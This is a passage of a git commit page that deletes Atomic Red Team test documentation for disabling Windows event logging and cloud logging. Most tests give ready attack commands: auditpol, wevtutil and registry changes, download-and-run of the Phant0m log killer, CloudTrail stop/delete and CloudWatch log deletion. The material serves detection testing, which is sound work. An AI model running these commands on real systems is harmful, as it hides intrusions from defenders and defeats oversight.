security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

clear markdown for migrated/merged tests

Browse Source
This commit is contained in:
Phil Hagen
2026-04-28 20:48:31 -06:00
parent 474f9a4aec
commit 8f98156f3e
10 changed files with 0 additions and 5602 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1685.001/T1685.001.md
-316
View File
@@ -1,316 +0,0 @@
# T1685.001 - Disable or Modify Tools: Disable or Modify Windows Event Log
## Description from ATT&CK
> Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
>
> The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol)
>
> Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the <code>Set-Service -Name EventLog -Status Stopped</code> or <code>sc config eventlog start=disabled</code> commands (followed by manually stopping the service using <code>Stop-Service -Name EventLog</code>).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog</code> then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)
>
> There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.(Citation: disable_win_evt_logging)
>
> Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1685.001_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1685.001_redcanaryco)
>
> By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
[Source](https://attack.mitre.org/techniques/T1685/001)
## Atomic Tests
- [Atomic Test #1: Disable Windows IIS HTTP Logging](#atomic-test-1-disable-windows-iis-http-logging)
- [Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell](#atomic-test-2-disable-windows-iis-http-logging-via-powershell)
- [Atomic Test #3: Kill Event Log Service Threads](#atomic-test-3-kill-event-log-service-threads)
- [Atomic Test #4: Impair Windows Audit Log Policy](#atomic-test-4-impair-windows-audit-log-policy)
- [Atomic Test #5: Clear Windows Audit Policy Config](#atomic-test-5-clear-windows-audit-policy-config)
- [Atomic Test #6: Disable Event Logging with wevtutil](#atomic-test-6-disable-event-logging-with-wevtutil)
- [Atomic Test #7: Makes Eventlog blind with Phant0m](#atomic-test-7-makes-eventlog-blind-with-phant0m)
- [Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell](#atomic-test-8-modify-event-log-channel-access-permissions-via-registry---powershell)
- [Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell](#atomic-test-9-modify-event-log-channel-access-permissions-via-registry-2---powershell)
- [Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell](#atomic-test-10-modify-event-log-access-permissions-via-registry---powershell)
### Atomic Test #1: Disable Windows IIS HTTP Logging
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
**Supported Platforms:** Windows
**auto_generated_guid:** `69435dcf-c66f-4ec0-a8b1-82beb76b34db`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
#### Attack Commands: Run with `powershell`!
```powershell
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
#### Cleanup Commands
```powershell
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}
```
### Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
**Supported Platforms:** Windows
**auto_generated_guid:** `a957fb0f-1e85-49b2-a211-413366784b1e`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
#### Attack Commands: Run with `powershell`!
```powershell
set-WebConfigurationProperty -PSPath "IIS:\Sites\#{website_name}\" -filter "system.webServer/httpLogging" -name dontLog -value $true
```
#### Cleanup Commands
```powershell
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}
```
### Atomic Test #3: Kill Event Log Service Threads
Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
**Supported Platforms:** Windows
**auto_generated_guid:** `41ac52ba-5d5e-40c0-b267-573ed90489bd`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
$output = "$env:TEMP\Invoke-Phant0m.ps1"
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
cd $env:TEMP
Import-Module .\Invoke-Phant0m.ps1
Invoke-Phant0m
```
#### Cleanup Commands
```powershell
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
```
### Atomic Test #4: Impair Windows Audit Log Policy
Disables the windows audit policy to prevent key host based telemetry being written into the event logs.
[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
**Supported Platforms:** Windows
**auto_generated_guid:** `5102a3a7-e2d7-4129-9e45-f483f2e0eea8`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable
```
#### Cleanup Commands
```cmd
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
```
### Atomic Test #5: Clear Windows Audit Policy Config
Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.
**Supported Platforms:** Windows
**auto_generated_guid:** `913c0e4e-4b37-4b78-ad0b-90e7b25010f6`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
auditpol /clear /y
auditpol /remove /allusers
```
#### Cleanup Commands
```cmd
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
```
### Atomic Test #6: Disable Event Logging with wevtutil
Wevtutil can be used to disable logs.
NOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.
**Supported Platforms:** Windows
**auto_generated_guid:** `b26a3340-dad7-4360-9176-706269c74103`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_name | Name of the log to be disabled | string | Microsoft-Windows-IKE/Operational|
#### Attack Commands: Run with `command_prompt`!
```cmd
wevtutil sl "#{log_name}" /e:false
```
#### Cleanup Commands
```cmd
wevtutil sl "#{log_name}" /e:true
```
### Atomic Test #7: Makes Eventlog blind with Phant0m
Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
**Supported Platforms:** Windows
**auto_generated_guid:** `3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | exe version of Phant0m | path | PathToAtomicsFolder&#92;T1685.001&#92;bin&#92;Phant0m.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
"#{file_name}"
```
#### Cleanup Commands
```cmd
echo "Sorry you have to reboot"
```
#### Dependencies: Run with `powershell`!
##### Description: Phant0m.exe must exist on disk at specified location (#{file_name})
###### Check Prereq Commands
```powershell
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
```
### Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
**Supported Platforms:** Windows
**auto_generated_guid:** `8e81d090-0cd6-4d46-863c-eec11311298f`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ChannelPath | Path to the event log service channel to alter | string | HKLM:&#92;SOFTWARE&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;WINEVT&#92;Channels&#92;Microsoft-Windows-TaskScheduler/Operational|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
```
#### Cleanup Commands
```powershell
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
```
### Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
**Supported Platforms:** Windows
**auto_generated_guid:** `85e6eff8-3ed4-4e03-ae50-aa6a404898a5`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ChannelPath | Path to the event log service channel to alter | string | HKLM:&#92;SOFTWARE&#92;Policies&#92;Microsoft&#92;Windows&#92;EventLog&#92;Setup|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-Item -Path #{ChannelPath} -Force
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
```
#### Cleanup Commands
```powershell
Remove-Item -Path #{ChannelPath} -Force
Restart-Service -Name EventLog -Force -ErrorAction Ignore
```
### Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell
This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
**Supported Platforms:** Windows
**auto_generated_guid:** `a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| CustomSDPath | Path to the event log service channel to alter | string | HKLM:&#92;SYSTEM&#92;CurrentControlSet&#92;Services&#92;EventLog&#92;System|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"
```
atomics/T1685.002/T1685.002.md
-733
View File
@@ -1,733 +0,0 @@
# T1685.002 - Disable or Modify Tools: Disable or Modify Cloud Log
## Description from ATT&CK
> An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
>
> For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the users license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
[Source](https://attack.mitre.org/techniques/T1685/002)
## Atomic Tests
- [Atomic Test #1: AWS - CloudTrail Changes](#atomic-test-1-aws---cloudtrail-changes)
- [Atomic Test #2: Azure - Eventhub Deletion](#atomic-test-2-azure---eventhub-deletion)
- [Atomic Test #3: Office 365 - Exchange Audit Log Disabled](#atomic-test-3-office-365---exchange-audit-log-disabled)
- [Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus](#atomic-test-4-aws---disable-cloudtrail-logging-through-event-selectors-using-stratus)
- [Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus](#atomic-test-5-aws---cloudtrail-logs-impairment-through-s3-lifecycle-rule-using-stratus)
- [Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus](#atomic-test-6-aws---remove-vpc-flow-logs-using-stratus)
- [Atomic Test #7: AWS - CloudWatch Log Group Deletes](#atomic-test-7-aws---cloudwatch-log-group-deletes)
- [Atomic Test #8: AWS CloudWatch Log Stream Deletes](#atomic-test-8-aws-cloudwatch-log-stream-deletes)
- [Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox](#atomic-test-9-office-365---set-audit-bypass-for-a-mailbox)
- [Atomic Test #10: GCP - Delete Activity Event Log](#atomic-test-10-gcp---delete-activity-event-log)
- [Atomic Test #11: AWS - Config Logs Disabled](#atomic-test-11-aws---config-logs-disabled)
### Atomic Test #1: AWS - CloudTrail Changes
Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail
**Supported Platforms:** Iaas:aws
**auto_generated_guid:** `9c10dc6b-20bd-403a-8e67-50ef7d07ed4e`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cloudtrail_name | Name of the cloudTrail | string | redatomictesttrail|
| s3_bucket_name | Name of the bucket | string | redatomic-test|
| region | Name of the region | string | us-east-1|
#### Attack Commands: Run with `sh`!
```sh
aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
```
#### Cleanup Commands
```sh
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform destroy -auto-approve
```
#### Dependencies: Run with `sh`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
###### Check Prereq Commands
```sh
cat ~/.aws/credentials | grep "default"
```
###### Get Prereq Commands
```sh
echo Please install the aws-cli and configure your AWS default profile using: aws configure
```
##### Description: Check if terraform is installed.
###### Check Prereq Commands
```sh
terraform version
```
###### Get Prereq Commands
```sh
echo Please install the terraform and configure your aws default profile
```
##### Description: Check if the dependency resources are already present.
###### Check Prereq Commands
```sh
if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform init
terraform apply -auto-approve
```
### Atomic Test #2: Azure - Eventhub Deletion
Identifies an Event Hub deletion in Azure.
An Event Hub is an event processing service that ingests and processes large volumes of events and data.
An adversary may delete an Event Hub in an attempt to evade detection.
https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
**Supported Platforms:** Iaas:azure
**auto_generated_guid:** `5e09bed0-7d33-453b-9bf3-caea32bff719`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Azure username | string | |
| password | Azure password | string | |
| event_hub_name | Name of the eventhub | string | test_eventhub|
| resource_group | Name of the resource group | string | |
| name_space_name | Name of the NameSpace | string | |
#### Attack Commands: Run with `powershell`!
```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-AzureAD -Credential $creds
Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
```
#### Cleanup Commands
```powershell
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform destroy -auto-approve
```
#### Dependencies: Run with `powershell`!
##### Description: Install-Module -Name Az
###### Check Prereq Commands
```powershell
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
```
###### Get Prereq Commands
```powershell
Install-Module -Name AzureAD -Force
```
##### Description: Check if terraform is installed.
###### Check Prereq Commands
```powershell
terraform version
```
###### Get Prereq Commands
```powershell
echo Please install the terraform.
```
##### Description: Check if the user is logged into Azure.
###### Check Prereq Commands
```powershell
az account show
```
###### Get Prereq Commands
```powershell
echo Configure your Azure account using: az login.
```
##### Description: Create dependency resources using terraform
###### Check Prereq Commands
```powershell
try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
```
###### Get Prereq Commands
```powershell
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform init
terraform apply -auto-approve
```
### Atomic Test #3: Office 365 - Exchange Audit Log Disabled
You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox.
Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline.
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml
**Supported Platforms:** Office-365
**auto_generated_guid:** `1ee572f3-056c-4632-a7fc-7e7c42b1543c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | office-365 username | string | |
| password | office-365 password | string | |
#### Attack Commands: Run with `powershell`!
```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False
```
#### Cleanup Commands
```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True
```
#### Dependencies: Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed
###### Check Prereq Commands
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
```
###### Get Prereq Commands
```powershell
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
```
### Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
**Supported Platforms:** Linux, macOS, Iaas:aws
**auto_generated_guid:** `a27418de-bdce-4ebd-b655-38f11142bf0c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
```sh
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force
```
#### Cleanup Commands
```sh
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
```
#### Dependencies: Run with `sh`!
##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)
###### Check Prereq Commands
```sh
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
```
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
###### Check Prereq Commands
```sh
cat ~/.aws/credentials | grep "default"
```
###### Get Prereq Commands
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
```
### Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
**Supported Platforms:** Linux, macOS, Iaas:aws
**auto_generated_guid:** `22d89a2f-d475-4895-b2d4-68626d49c029`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
```sh
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force
```
#### Cleanup Commands
```sh
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
```
#### Dependencies: Run with `sh`!
##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)
###### Check Prereq Commands
```sh
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
```
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
###### Check Prereq Commands
```sh
cat ~/.aws/credentials | grep "default"
```
###### Get Prereq Commands
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
```
### Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus
This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
**Supported Platforms:** Linux, macOS, Iaas:aws
**auto_generated_guid:** `93c150f5-ad7b-4ee3-8992-df06dec2ac79`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
```sh
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force
```
#### Cleanup Commands
```sh
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
```
#### Dependencies: Run with `sh`!
##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)
###### Check Prereq Commands
```sh
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
```
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
###### Check Prereq Commands
```sh
cat ~/.aws/credentials | grep "default"
```
###### Get Prereq Commands
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
```
### Atomic Test #7: AWS - CloudWatch Log Group Deletes
Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by
deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
**Supported Platforms:** Iaas:aws
**auto_generated_guid:** `89422c87-b57b-4a04-a8ca-802bb9d06121`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cloudwatch_log_group_name | Name of the cloudWatch log group | string | log-test|
| region | Name of the region | string | us-east-1|
#### Attack Commands: Run with `sh`!
```sh
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
```
